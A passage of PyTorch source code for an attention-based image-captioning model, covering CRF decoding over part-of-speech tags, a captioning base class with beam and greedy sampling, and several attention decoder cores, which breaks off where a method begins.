                if ``batch_first`` is ``False``, ``(batch_size, seq_length)`` otherwise.
        Returns:
            List of list containing the best tag sequence for each batch.
        """
        self._validate(emissions, mask=mask)
        # Default mask: every timestep of every sequence is valid.
        if mask is None:
            mask = emissions.new_ones(emissions.shape[:2], dtype=torch.uint8)
        if self.batch_first:
            # Viterbi is implemented time-major; transpose inputs accordingly.
            emissions = emissions.transpose(0, 1)
            mask = mask.transpose(0, 1)
        return self._viterbi_decode(emissions, mask)
def _validate(
self,
emissions,
tags = None,
mask = None):
if emissions.dim() != 3:
print('emissions must have dimension of 3, got', emissions.dim())
if emissions.size(2) != self.num_tags:
print('expected last dimension of emissions is',self.num_tags)
print('got:', emissions.size(2))
if tags is not None:
if emissions.shape[:2] != tags.shape:
print('the first two dimensions of emissions and tags must match')
if mask is not None:
if emissions.shape[:2] != mask.shape:
print('the first two dimensions of emissions and mask must match')
# no_empty_seq = not self.batch_first and mask[0].all()
# no_empty_seq_bf = self.batch_first and mask[:, 0].all()
# if not no_empty_seq and not no_empty_seq_bf:
# print('mask of the first timestep must all be on')
    def _compute_score(
            self, emissions, tags,
            mask):
        """Return the unnormalized score of each batch's given tag path.

        Sums start/end transition scores, pairwise transition scores and
        emission scores along the path, masking out padded timesteps.
        """
        # emissions: (seq_length, batch_size, num_tags)
        # tags: (seq_length, batch_size)
        # mask: (seq_length, batch_size)
        assert emissions.dim() == 3 and tags.dim() == 2
        assert emissions.shape[:2] == tags.shape
        assert emissions.size(2) == self.num_tags
        assert mask.shape == tags.shape
        #assert mask[0].all()
        seq_length, batch_size = tags.shape
        mask = mask.float()
        # Start transition score and first emission
        # shape: (batch_size,)
        score = self.start_transitions[tags[0]]
        score += emissions[0, torch.arange(batch_size).long(), tags[0]]
        for i in range(1, seq_length):
            # Transition score to next tag, only added if next timestep is valid (mask == 1)
            # shape: (batch_size,)
            score += self.transitions[tags[i - 1], tags[i]] * mask[i]
            # Emission score for next tag, only added if next timestep is valid (mask == 1)
            # shape: (batch_size,)
            score += emissions[i, torch.arange(batch_size).long(), tags[i]] * mask[i]
        # End transition score
        # shape: (batch_size,)  -- index of each sequence's last valid step
        seq_ends = mask.long().sum(dim=0) - 1
        # shape: (batch_size,)
        last_tags = tags[seq_ends, torch.arange(batch_size).long()]
        # shape: (batch_size,)
        score += self.end_transitions[last_tags]
        return score
    def _compute_normalizer(
            self, emissions, mask):
        """Return the log partition function (normalizer) for each sequence.

        Runs the CRF forward algorithm in log space (log-sum-exp over all
        possible tag sequences). Returns a tensor of shape (batch_size,).
        """
        # emissions: (seq_length, batch_size, num_tags)
        # mask: (seq_length, batch_size)
        assert emissions.dim() == 3 and mask.dim() == 2
        assert emissions.shape[:2] == mask.shape
        assert emissions.size(2) == self.num_tags
        #assert mask[0].all()
        seq_length = emissions.size(0)
        # Start transition score and first emission; score has size of
        # (batch_size, num_tags) where for each batch, the j-th column stores
        # the score that the first timestep has tag j
        # shape: (batch_size, num_tags)
        score = self.start_transitions + emissions[0]
        for i in range(1, seq_length):
            # Broadcast score for every possible next tag
            # shape: (batch_size, num_tags, 1)
            broadcast_score = score.unsqueeze(2)
            # Broadcast emission score for every possible current tag
            # shape: (batch_size, 1, num_tags)
            broadcast_emissions = emissions[i].unsqueeze(1)
            # Compute the score tensor of size (batch_size, num_tags, num_tags) where
            # for each sample, entry at row i and column j stores the sum of scores of all
            # possible tag sequences so far that end with transitioning from tag i to tag j
            # and emitting
            # shape: (batch_size, num_tags, num_tags)
            next_score = broadcast_score + self.transitions + broadcast_emissions
            # Sum over all possible current tags, but we're in score space, so a sum
            # becomes a log-sum-exp: for each sample, entry i stores the sum of scores of
            # all possible tag sequences so far, that end in tag i
            # shape: (batch_size, num_tags)
            #print(next_score.size())
            next_score = logsumexp(next_score, dim=1)
            # Set score to the next score if this timestep is valid (mask == 1)
            # shape: (batch_size, num_tags)
            score = torch.where(mask[i].byte().unsqueeze(1), next_score, score)
        # End transition score
        # shape: (batch_size, num_tags)
        score += self.end_transitions
        # Sum (log-sum-exp) over all possible tags
        # shape: (batch_size,)
        return logsumexp(score, dim=1)
    def _viterbi_decode(self, emissions,
                        mask):
        """Find the highest-scoring tag sequence for each sample (Viterbi).

        Returns a list (length batch_size) of best tag-id lists, each list's
        length equal to the corresponding sequence's unmasked length.
        """
        # emissions: (seq_length, batch_size, num_tags)
        # mask: (seq_length, batch_size)
        assert emissions.dim() == 3 and mask.dim() == 2
        assert emissions.shape[:2] == mask.shape
        assert emissions.size(2) == self.num_tags
        #assert mask[0].all()
        seq_length, batch_size = mask.shape
        # Start transition and first emission
        # shape: (batch_size, num_tags)
        score = self.start_transitions + emissions[0]
        history = []
        # score is a tensor of size (batch_size, num_tags) where for every batch,
        # value at column j stores the score of the best tag sequence so far that ends
        # with tag j
        # history saves where the best tags candidate transitioned from; this is used
        # when we trace back the best tag sequence
        # Viterbi algorithm recursive case: we compute the score of the best tag sequence
        # for every possible next tag
        for i in range(1, seq_length):
            # Broadcast viterbi score for every possible next tag
            # shape: (batch_size, num_tags, 1)
            broadcast_score = score.unsqueeze(2)
            # Broadcast emission score for every possible current tag
            # shape: (batch_size, 1, num_tags)
            broadcast_emission = emissions[i].unsqueeze(1)
            # Compute the score tensor of size (batch_size, num_tags, num_tags) where
            # for each sample, entry at row i and column j stores the score of the best
            # tag sequence so far that ends with transitioning from tag i to tag j and emitting
            # shape: (batch_size, num_tags, num_tags)
            next_score = broadcast_score + self.transitions + broadcast_emission
            # Find the maximum score over all possible current tag
            # shape: (batch_size, num_tags)
            next_score, indices = next_score.max(dim=1)
            # Set score to the next score if this timestep is valid (mask == 1)
            # and save the index that produces the next score
            # shape: (batch_size, num_tags)
            # NOTE(review): unlike _compute_normalizer this does not call .byte() on
            # mask[i] before torch.where — assumes mask is already a Bool/ByteTensor;
            # confirm against callers.
            score = torch.where(mask[i].unsqueeze(1), next_score, score)
            history.append(indices)
        # End transition score
        # shape: (batch_size, num_tags)
        score += self.end_transitions
        # Now, compute the best path for each sample
        # shape: (batch_size,)
        seq_ends = mask.long().sum(dim=0) - 1
        best_tags_list = []
        for idx in range(batch_size):
            # Find the tag which maximizes the score at the last timestep; this is our best tag
            # for the last timestep
            _, best_last_tag = score[idx].max(dim=0)
            best_tags = [best_last_tag.item()]
            # We trace back where the best last tag comes from, append that to our best tag
            # sequence, and trace it back again, and so on
            for hist in reversed(history[:seq_ends[idx]]):
                best_last_tag = hist[idx][best_tags[-1]]
                best_tags.append(best_last_tag.item())
            # Reverse the order because we start from the last timestep
            best_tags.reverse()
            best_tags_list.append(best_tags)
        return best_tags_list
class AttModel(CaptionModel):
    """Attention-based captioning model base class.

    Owns the word embedding, fc/att feature embeddings, word- and POS-logit
    heads, and a CRF over POS emissions. Subclasses are expected to provide
    ``self.core`` (one decoding step); ``self.att_type == "intra"`` routes the
    list of previous states into the core for intra/temporal attention.
    """
    def __init__(self, opt):
        super(AttModel, self).__init__()
        self.att_type = opt.att_type
        self.use_crf = opt.use_crf
        self.vocab_size = opt.vocab_size
        self.pos_size = opt.pos_size
        self.input_encoding_size = opt.input_encoding_size
        #self.rnn_type = opt.rnn_type
        self.rnn_size = opt.rnn_size
        self.num_layers = opt.num_layers
        self.drop_prob_lm = opt.drop_prob_lm
        self.seq_length = opt.seq_length
        self.fc_feat_size = opt.fc_feat_size
        self.att_feat_size = opt.att_feat_size
        self.att_hid_size = opt.att_hid_size
        self.use_bn = getattr(opt, 'use_bn', 0)
        self.ss_prob = 0.0 # Schedule sampling probability
        # word embedding: id -> input_encoding_size vector (+1 slot for <bos>/<eos> index 0)
        self.embed = nn.Sequential(nn.Embedding(self.vocab_size + 1, self.input_encoding_size),
                                nn.ReLU(),
                                nn.Dropout(self.drop_prob_lm))
        self.fc_embed = nn.Sequential(nn.Linear(self.fc_feat_size, self.rnn_size),
                                    nn.ReLU(),
                                    nn.Dropout(self.drop_prob_lm))
        # optional BatchNorm before (use_bn) and/or after (use_bn==2) the att projection
        self.att_embed = nn.Sequential(*(
                                    ((nn.BatchNorm1d(self.att_feat_size),) if self.use_bn else ())+
                                    (nn.Linear(self.att_feat_size, self.rnn_size),
                                    nn.ReLU(),
                                    nn.Dropout(self.drop_prob_lm))+
                                    ((nn.BatchNorm1d(self.rnn_size),) if self.use_bn==2 else ())))
        self.logit_layers = getattr(opt, 'logit_layers', 1)
        if self.logit_layers == 1:
            self.logit = nn.Linear(self.rnn_size, self.vocab_size + 1)
        else:
            self.logit = [[nn.Linear(self.rnn_size, self.rnn_size), nn.ReLU(), nn.Dropout(0.5)] for _ in range(opt.logit_layers - 1)]
            self.logit = nn.Sequential(*(reduce(lambda x,y:x+y, self.logit) + [nn.Linear(self.rnn_size, self.vocab_size + 1)]))
        # extra word-logit path fed by the attention context (added to self.logit output)
        self.att_res_layers = nn.Linear(self.rnn_size, self.vocab_size + 1)
        self.pos_logit = nn.Linear(self.rnn_size, self.pos_size + 1)
        self.ctx2att = nn.Linear(self.rnn_size, self.att_hid_size)
        self.crf = CRF(self.pos_size + 1, batch_first = True)
    def init_hidden(self, bsz):
        """Zero (h, c) states for batch size bsz, matching parameter device/dtype."""
        weight = next(self.parameters())
        return (weight.new_zeros(self.num_layers, bsz, self.rnn_size),
                weight.new_zeros(self.num_layers, bsz, self.rnn_size))
    def clip_att(self, att_feats, att_masks):
        # Clip the length of att_masks and att_feats to the maximum length
        if att_masks is not None:
            max_len = att_masks.data.long().sum(1).max()
            att_feats = att_feats[:, :max_len].contiguous()
            att_masks = att_masks[:, :max_len].contiguous()
        return att_feats, att_masks
    def _prepare_feature(self, fc_feats, att_feats, att_masks):
        """Embed fc/att features and pre-project att features for attention."""
        #find max w*h of att_feats, make it contiguous
        att_feats, att_masks = self.clip_att(att_feats, att_masks)
        # embed fc and att feats
        fc_feats = self.fc_embed(fc_feats) # fc - relu - dropout become [bach_size, rnn_size]
        att_feats = pack_wrapper(self.att_embed, att_feats, att_masks) #
        # Project the attention feats first to reduce memory and computation comsumptions.
        p_att_feats = self.ctx2att(att_feats) # fc become [batch_size, att_hid_size]
        return fc_feats, att_feats, p_att_feats, att_masks
    def _forward(self, fc_feats, att_feats, seq, pos, masks, att_masks=None):
        """Teacher-forced pass. Returns (word log-probs over seq_len-1 steps,
        CRF log-likelihood of the POS sequence given the POS emissions)."""
        batch_size = fc_feats.size(0)
        state = self.init_hidden(batch_size)
        #[batch_size, seq_length-1, vocab_size+1]
        outputs = fc_feats.new_zeros(batch_size, seq.size(1) - 1, self.vocab_size+1)
        emissions = fc_feats.new_zeros(batch_size, seq.size(1) - 1, self.pos_size+1)
        # Prepare the features
        #p_fc_feats:[batch_size, rnn_size]
        #p_att_feats:[batch_size, w*h, rnn_size ]
        #pp_att_feats:[batch_size, w*h, att_hid_size]
        #p_att_masks:[batch_size, max_K]
        p_fc_feats, p_att_feats, pp_att_feats, p_att_masks = self._prepare_feature(fc_feats, att_feats, att_masks)
        # pp_att_feats is used for attention, we cache it in advance to reduce computation cost
        states = []
        for i in range(seq.size(1) - 1):
            # Scheduled sampling: with probability ss_prob each sample is fed a word
            # drawn from the previous step's output distribution instead of the
            # ground-truth word; the rest of the batch uses the ground truth.
            states.append(state)
            if self.training and i >= 1 and self.ss_prob > 0.0: # otherwise no need to sample
                sample_prob = fc_feats.new(batch_size).uniform_(0, 1)
                sample_mask = sample_prob < self.ss_prob
                if sample_mask.sum() == 0:
                    it = seq[:, i].clone()
                else:
                    # 1-D indices of the samples selected for scheduled sampling
                    sample_ind = sample_mask.nonzero().view(-1)
                    it = seq[:, i].data.clone()
                    #prob_prev = torch.exp(outputs[-1].data.index_select(0, sample_ind)) # fetch prev distribution: shape Nx(M+1)
                    #it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1))
                    # prob_prev = torch.exp(outputs[-1].data) # fetch prev distribution: shape Nx(M+1)
                    prob_prev = torch.exp(outputs[:, i-1].detach()) # fetch prev distribution: shape Nx(M+1)
                    # index_copy_(dim, index, tensor): overwrite rows of `it` at positions
                    # sample_ind with the corresponding sampled word ids
                    it.index_copy_(0, sample_ind, torch.multinomial(prob_prev, 1).view(-1).index_select(0, sample_ind))#it:[sample_ind_size]
            else:
                it = seq[:, i].clone()
            # break if all the sequences end
            if i >= 1 and seq[:, i].sum() == 0:
                break
            if self.att_type == "intra" and i != 0:
                output, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state, states)
            else:
                output, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state)
            outputs[:, i] = output
            emissions[:, i] = emission
        return outputs, self.crf(emissions, pos, masks, reduction = 'token_mean')
    def get_logprobs_state(self, it, fc_feats, att_feats, p_att_feats, att_masks, state, *args):
        """Run one core step for word ids `it`; returns (word log-probs, new state,
        POS emission log-probs). Extra *args (previous states) trigger the
        intra-attention core path."""
        # 'it' contains a word index
        xt = self.embed(it)
        if args == ():
            output, state, att_res = self.core(xt, fc_feats, att_feats, p_att_feats, state, att_masks)
            logprobs = F.log_softmax(self.logit(output) + self.att_res_layers(att_res), dim=1)
            emission = F.log_softmax(self.pos_logit(output), dim = 1)
        else:
            output, state, att_res, ht_d = self.core(xt, fc_feats, att_feats, p_att_feats, state, att_masks, *args)
            logprobs = F.log_softmax(self.logit(output) + self.att_res_layers(att_res), dim=1)
            emission = F.log_softmax(self.pos_logit(output), dim = 1)
        return logprobs, state, emission
    def _sample_beam(self, fc_feats, att_feats, att_masks=None, opt={}):
        """Beam-search sampling. Feeds <bos> once, then delegates to
        self.beam_search (inherited); processes each image independently."""
        beam_size = opt.get('beam_size', 10)
        batch_size = fc_feats.size(0)
        p_fc_feats, p_att_feats, pp_att_feats, p_att_masks = self._prepare_feature(fc_feats, att_feats, att_masks)
        assert beam_size <= self.vocab_size + 1, 'lets assume this for now, otherwise this corner case causes a few headaches down the road. can be dealt with in future if needed'
        seq = torch.LongTensor(self.seq_length, batch_size).zero_()
        seqLogprobs = torch.FloatTensor(self.seq_length, batch_size)
        # lets process every image independently for now, for simplicity
        self.done_beams = [[] for _ in range(batch_size)]
        for k in range(batch_size):
            state = self.init_hidden(beam_size)
            # replicate image k's features beam_size times
            tmp_fc_feats = p_fc_feats[k:k+1].expand(beam_size, p_fc_feats.size(1))
            tmp_att_feats = p_att_feats[k:k+1].expand(*((beam_size,)+p_att_feats.size()[1:])).contiguous()
            tmp_p_att_feats = pp_att_feats[k:k+1].expand(*((beam_size,)+pp_att_feats.size()[1:])).contiguous()
            tmp_att_masks = p_att_masks[k:k+1].expand(*((beam_size,)+p_att_masks.size()[1:])).contiguous() if att_masks is not None else None
            for t in range(1):
                if t == 0: # input <bos>
                    it = fc_feats.new_zeros([beam_size], dtype=torch.long)
                logprobs, state, _ = self.get_logprobs_state(it, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, tmp_att_masks, state)
            self.done_beams[k] = self.beam_search(state, logprobs, tmp_fc_feats, tmp_att_feats, tmp_p_att_feats, tmp_att_masks, opt=opt)
            seq[:, k] = self.done_beams[k][0]['seq'] # the first beam has highest cumulative score
            seqLogprobs[:, k] = self.done_beams[k][0]['logps']
        # return the samples and their log likelihoods
        return seq.transpose(0, 1), seqLogprobs.transpose(0, 1)
    def _sample(self, fc_feats, att_feats, att_masks=None, opt={}):
        """Greedy / multinomial sampling (delegates to _sample_beam for beam > 1).
        Returns (sampled word ids, per-step log-probs), both (batch, seq_length)."""
        sample_max = opt.get('sample_max', 1)
        beam_size = opt.get('beam_size', 1)
        temperature = opt.get('temperature', 1.0)
        decoding_constraint = opt.get('decoding_constraint', 0)
        if beam_size > 1:
            return self._sample_beam(fc_feats, att_feats, att_masks, opt)
        batch_size = fc_feats.size(0)
        state = self.init_hidden(batch_size)
        p_fc_feats, p_att_feats, pp_att_feats, p_att_masks = self._prepare_feature(fc_feats, att_feats, att_masks)
        seq = fc_feats.new_zeros((batch_size, self.seq_length), dtype=torch.long)
        seqLogprobs = fc_feats.new_zeros(batch_size, self.seq_length)
        #seqEmission = fc_feats.new_zeros(batch_size, self.seq_length, self.vocab_size + 1)
        states = []
        for t in range(self.seq_length + 1):
            if t == 0: # input <bos>
                it = fc_feats.new_zeros(batch_size, dtype=torch.long)
            if self.att_type == "intra" and t != 0:
                logprobs, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state, states)
            else:
                logprobs, state, emission = self.get_logprobs_state(it, p_fc_feats, p_att_feats, pp_att_feats, p_att_masks, state)
            # decoding_constraint (default 0 = off): when on, forbid emitting the
            # same word at two consecutive timesteps
            states.append(state)
            if decoding_constraint and t > 0:
                tmp = logprobs.new_zeros(logprobs.size())
                tmp.scatter_(1, seq[:,t-1].data.unsqueeze(1), float('-inf'))
                logprobs = logprobs + tmp
            #seqEmission[:, t, :] = logprobs
            # sample the next word
            if t == self.seq_length: # skip if we achieve maximum length
                break
            # sample_max defaults to 1. For RL training set sample_max = 0
            # (multinomial sampling); at test time sample_max = 1 takes the
            # argmax at every step.
            if sample_max:
                sampleLogprobs, it = torch.max(logprobs.data, 1)
                it = it.view(-1).long()
            else:
                if temperature == 1.0:
                    prob_prev = torch.exp(logprobs.data) # fetch prev distribution: shape Nx(M+1)
                else:
                    # scale logprobs by temperature
                    prob_prev = torch.exp(torch.div(logprobs.data, temperature))
                it = torch.multinomial(prob_prev, 1)
                sampleLogprobs = logprobs.gather(1, it) # gather the logprobs at sampled positions
                it = it.view(-1).long() # and flatten indices for downstream processing
            # stop when all finished
            if t == 0:
                unfinished = it > 0
            else:
                unfinished = unfinished * (it > 0)
            it = it * unfinished.type_as(it)
            seq[:,t] = it
            seqLogprobs[:,t] = sampleLogprobs.view(-1)
            # quit loop if all sequences have finished
            if unfinished.sum() == 0:
                break
        # if self.att_type == 'intra' and self.use_crf:
        #     self.crf.decode(seqLogprobs), seqLogprobs
        # else:
        #     return seq, seqLogprobs
        return seq, seqLogprobs
class AdaAtt_lstm(nn.Module):
    """Multi-layer LSTM for the Adaptive Attention model.

    In addition to the usual hidden/cell states it emits a "fake region"
    (visual sentinel) from the top layer, which AdaAtt_attention later mixes
    with the real image regions.
    """
    def __init__(self, opt, use_maxout=True):
        super(AdaAtt_lstm, self).__init__()
        self.input_encoding_size = opt.input_encoding_size
        #self.rnn_type = opt.rnn_type
        self.rnn_size = opt.rnn_size
        self.num_layers = opt.num_layers
        self.drop_prob_lm = opt.drop_prob_lm
        self.fc_feat_size = opt.fc_feat_size
        self.att_feat_size = opt.att_feat_size
        self.att_hid_size = opt.att_hid_size
        self.use_maxout = use_maxout
        # Build a LSTM
        # 4 gate chunks, plus 1 extra chunk for the input transform when maxout is on
        self.w2h = nn.Linear(self.input_encoding_size, (4+(use_maxout==True)) * self.rnn_size)
        self.v2h = nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size)
        self.i2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers - 1)])
        self.h2h = nn.ModuleList([nn.Linear(self.rnn_size, (4+(use_maxout==True)) * self.rnn_size) for _ in range(self.num_layers)])
        # Layers for getting the fake region
        if self.num_layers == 1:
            self.r_w2h = nn.Linear(self.input_encoding_size, self.rnn_size)
            self.r_v2h = nn.Linear(self.rnn_size, self.rnn_size)
        else:
            self.r_i2h = nn.Linear(self.rnn_size, self.rnn_size)
            self.r_h2h = nn.Linear(self.rnn_size, self.rnn_size)
    def forward(self, xt, img_fc, state):
        """One timestep.

        xt: word embedding; img_fc: embedded fc feature; state: (h, c) stacks
        of shape (num_layers, batch, rnn_size).
        Returns (top_h, fake_region, new_state).
        """
        hs = []
        cs = []
        for L in range(self.num_layers):
            # c,h from previous timesteps
            prev_h = state[0][L]
            prev_c = state[1][L]
            # the input to this layer
            if L == 0:
                x = xt
                i2h = self.w2h(x) + self.v2h(img_fc)
            else:
                x = hs[-1]
                x = F.dropout(x, self.drop_prob_lm, self.training)
                i2h = self.i2h[L-1](x)
            all_input_sums = i2h+self.h2h[L](prev_h)
            # first 3*rnn_size units are the in/forget/out gates
            sigmoid_chunk = all_input_sums.narrow(1, 0, 3 * self.rnn_size)
            sigmoid_chunk = F.sigmoid(sigmoid_chunk)
            # decode the gates
            in_gate = sigmoid_chunk.narrow(1, 0, self.rnn_size)
            forget_gate = sigmoid_chunk.narrow(1, self.rnn_size, self.rnn_size)
            out_gate = sigmoid_chunk.narrow(1, self.rnn_size * 2, self.rnn_size)
            # decode the write inputs
            if not self.use_maxout:
                in_transform = F.tanh(all_input_sums.narrow(1, 3 * self.rnn_size, self.rnn_size))
            else:
                # maxout: element-wise max over two rnn_size-wide halves
                in_transform = all_input_sums.narrow(1, 3 * self.rnn_size, 2 * self.rnn_size)
                in_transform = torch.max(\
                    in_transform.narrow(1, 0, self.rnn_size),
                    in_transform.narrow(1, self.rnn_size, self.rnn_size))
            # perform the LSTM update
            next_c = forget_gate * prev_c + in_gate * in_transform
            # gated cells form the output
            tanh_nex_c = F.tanh(next_c)
            next_h = out_gate * tanh_nex_c
            if L == self.num_layers-1:
                # visual sentinel is computed from the top layer only
                if L == 0:
                    i2h = self.r_w2h(x) + self.r_v2h(img_fc)
                else:
                    i2h = self.r_i2h(x)
                n5 = i2h+self.r_h2h(prev_h)
                fake_region = F.sigmoid(n5) * tanh_nex_c
            cs.append(next_c)
            hs.append(next_h)
        # set up the decoder
        top_h = hs[-1]
        top_h = F.dropout(top_h, self.drop_prob_lm, self.training)
        fake_region = F.dropout(fake_region, self.drop_prob_lm, self.training)
        state = (torch.cat([_.unsqueeze(0) for _ in hs], 0),
                torch.cat([_.unsqueeze(0) for _ in cs], 0))
        return top_h, fake_region, state
class AdaAtt_attention(nn.Module):
    """Adaptive attention over image regions plus the visual sentinel.

    Attends over [fake_region (sentinel); conv features] conditioned on the
    decoder output, and fuses the attended vector with the hidden state.
    """
    def __init__(self, opt):
        super(AdaAtt_attention, self).__init__()
        self.input_encoding_size = opt.input_encoding_size
        #self.rnn_type = opt.rnn_type
        self.rnn_size = opt.rnn_size
        self.drop_prob_lm = opt.drop_prob_lm
        self.att_hid_size = opt.att_hid_size
        # fake region embed
        self.fr_linear = nn.Sequential(
            nn.Linear(self.rnn_size, self.input_encoding_size),
            nn.ReLU(),
            nn.Dropout(self.drop_prob_lm))
        self.fr_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
        # h out embed
        self.ho_linear = nn.Sequential(
            nn.Linear(self.rnn_size, self.input_encoding_size),
            nn.Tanh(),
            nn.Dropout(self.drop_prob_lm))
        self.ho_embed = nn.Linear(self.input_encoding_size, self.att_hid_size)
        self.alpha_net = nn.Linear(self.att_hid_size, 1)
        self.att2h = nn.Linear(self.rnn_size, self.rnn_size)
    def forward(self, h_out, fake_region, conv_feat, conv_feat_embed, att_masks=None):
        """Return the fused hidden vector (batch, rnn_size)."""
        # View into three dimensions
        att_size = conv_feat.numel() // conv_feat.size(0) // self.rnn_size
        conv_feat = conv_feat.view(-1, att_size, self.rnn_size)
        conv_feat_embed = conv_feat_embed.view(-1, att_size, self.att_hid_size)
        # view neighbor from bach_size * neighbor_num x rnn_size to bach_size x rnn_size * neighbor_num
        fake_region = self.fr_linear(fake_region)
        fake_region_embed = self.fr_embed(fake_region)
        h_out_linear = self.ho_linear(h_out)
        h_out_embed = self.ho_embed(h_out_linear)
        # replicate the text query across all att_size regions + 1 sentinel slot
        txt_replicate = h_out_embed.unsqueeze(1).expand(h_out_embed.size(0), att_size + 1, h_out_embed.size(1))
        img_all = torch.cat([fake_region.view(-1,1,self.input_encoding_size), conv_feat], 1)
        # NOTE(review): fake_region_embed is att_hid_size wide but is viewed with
        # input_encoding_size here — this only works when the two sizes are equal;
        # confirm the config guarantees that.
        img_all_embed = torch.cat([fake_region_embed.view(-1,1,self.input_encoding_size), conv_feat_embed], 1)
        hA = F.tanh(img_all_embed + txt_replicate)
        hA = F.dropout(hA,self.drop_prob_lm, self.training)
        hAflat = self.alpha_net(hA.view(-1, self.att_hid_size))
        PI = F.softmax(hAflat.view(-1, att_size + 1), dim=1)
        if att_masks is not None:
            att_masks = att_masks.view(-1, att_size)
            # prepend a mask entry for the sentinel slot (assumed on at position 0), then renormalize
            PI = PI * torch.cat([att_masks[:,:1], att_masks], 1) # assume one one at the first time step.
            PI = PI / PI.sum(1, keepdim=True)
        visAtt = torch.bmm(PI.unsqueeze(1), img_all)
        visAttdim = visAtt.squeeze(1)
        atten_out = visAttdim + h_out_linear
        h = F.tanh(self.att2h(atten_out))
        h = F.dropout(h, self.drop_prob_lm, self.training)
        return h
class AdaAttCore(nn.Module):
    """Adaptive-attention decoding core: an AdaAtt LSTM followed by
    sentinel-augmented visual attention."""
    def __init__(self, opt, use_maxout=False):
        super(AdaAttCore, self).__init__()
        self.lstm = AdaAtt_lstm(opt, use_maxout)       # yields hidden state + visual sentinel
        self.attention = AdaAtt_attention(opt)         # mixes sentinel with spatial features
    def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
        """One decoding step: run the LSTM, then attend over regions + sentinel."""
        hidden, fake_region, state = self.lstm(xt, fc_feats, state)
        attended = self.attention(hidden, fake_region, att_feats, p_att_feats, att_masks)
        return attended, state
class TopDownCore(nn.Module):
    """Two-layer "top-down" attention core: an attention LSTM conditioned on
    [h_lang_{t-1}; fc; word], visual attention, then a language LSTM over
    [attended context; h_att]."""
    def __init__(self, opt, use_maxout=False):
        super(TopDownCore, self).__init__()
        self.drop_prob_lm = opt.drop_prob_lm
        self.att_lstm = nn.LSTMCell(opt.input_encoding_size + opt.rnn_size * 2, opt.rnn_size) # we, fc, h^2_t-1
        self.lang_lstm = nn.LSTMCell(opt.rnn_size * 2, opt.rnn_size) # h^1_t, \hat v
        self.attention = Attention(opt)
    def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
        """One decoding step; state stacks are indexed [att_layer, lang_layer]."""
        prev_lang_h = state[0][-1]
        h_att, c_att = self.att_lstm(torch.cat([prev_lang_h, fc_feats, xt], 1),
                                     (state[0][0], state[1][0]))
        att_res = self.attention(h_att, att_feats, p_att_feats, att_masks)
        h_lang, c_lang = self.lang_lstm(torch.cat([att_res, h_att], 1),
                                        (state[0][1], state[1][1]))
        out = F.dropout(h_lang, self.drop_prob_lm, self.training)
        return out, (torch.stack([h_att, h_lang]), torch.stack([c_att, c_lang]))
############################################################################
# Notice:
# StackAtt and DenseAtt are models that I randomly designed.
# They are not related to any paper.
############################################################################
from .FCModel import LSTMCore
class StackAttCore(nn.Module):
    """Three stacked LSTM layers with an attention step between consecutive
    layers (an experimental design, not from a published paper)."""
    def __init__(self, opt, use_maxout=False):
        super(StackAttCore, self).__init__()
        self.drop_prob_lm = opt.drop_prob_lm
        # self.att0 = Attention(opt)
        self.att1 = Attention(opt)
        self.att2 = Attention(opt)
        # Temporarily widen opt.input_encoding_size so each LSTMCore is built
        # with the input width it actually receives; restored afterwards.
        saved_encoding_size = opt.input_encoding_size
        opt.input_encoding_size = opt.input_encoding_size + opt.rnn_size
        self.lstm0 = LSTMCore(opt)  # consumes [word embedding; fc feature]
        opt.input_encoding_size = opt.rnn_size * 2
        self.lstm1 = LSTMCore(opt)
        self.lstm2 = LSTMCore(opt)
        opt.input_encoding_size = saved_encoding_size
        # self.emb1 = nn.Linear(opt.rnn_size, opt.rnn_size)
        self.emb2 = nn.Linear(opt.rnn_size, opt.rnn_size)
    def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
        """One step; state stacks are indexed [layer0, layer1, layer2]."""
        # att_res_0 = self.att0(state[0][-1], att_feats, p_att_feats, att_masks)
        h0, new_state0 = self.lstm0(torch.cat([xt, fc_feats], 1), [state[0][0:1], state[1][0:1]])
        att1 = self.att1(h0, att_feats, p_att_feats, att_masks)
        h1, new_state1 = self.lstm1(torch.cat([h0, att1], 1), [state[0][1:2], state[1][1:2]])
        att2 = self.att2(h1 + self.emb2(att1), att_feats, p_att_feats, att_masks)
        h2, new_state2 = self.lstm2(torch.cat([h1, att2], 1), [state[0][2:3], state[1][2:3]])
        merged_state = [torch.cat(parts, 0) for parts in zip(new_state0, new_state1, new_state2)]
        return h2, merged_state
class DenseAttCore(nn.Module):
    """Like StackAttCore but with dense (skip) connections: layer outputs are
    fused pairwise/triple-wise before being consumed downstream.
    (An experimental design, not from a published paper.)
    """
    def __init__(self, opt, use_maxout=False):
        super(DenseAttCore, self).__init__()
        self.drop_prob_lm = opt.drop_prob_lm
        # self.att0 = Attention(opt)
        self.att1 = Attention(opt)
        self.att2 = Attention(opt)
        # temporarily widen opt.input_encoding_size so each LSTMCore is built with
        # the input width it actually receives; the original value is restored below
        opt_input_encoding_size = opt.input_encoding_size
        opt.input_encoding_size = opt.input_encoding_size + opt.rnn_size
        self.lstm0 = LSTMCore(opt) # att_feat + word_embedding
        opt.input_encoding_size = opt.rnn_size * 2
        self.lstm1 = LSTMCore(opt)
        self.lstm2 = LSTMCore(opt)
        opt.input_encoding_size = opt_input_encoding_size
        # self.emb1 = nn.Linear(opt.rnn_size, opt.rnn_size)
        self.emb2 = nn.Linear(opt.rnn_size, opt.rnn_size)
        # fuse h_0 and h_1
        self.fusion1 = nn.Sequential(nn.Linear(opt.rnn_size*2, opt.rnn_size),
                                     nn.ReLU(),
                                     nn.Dropout(opt.drop_prob_lm))
        # fuse h_0, h_1 and h_2
        self.fusion2 = nn.Sequential(nn.Linear(opt.rnn_size*3, opt.rnn_size),
                                     nn.ReLU(),
                                     nn.Dropout(opt.drop_prob_lm))
    def forward(self, xt, fc_feats, att_feats, p_att_feats, state, att_masks=None):
        """One step; state stacks are indexed [layer0, layer1, layer2]."""
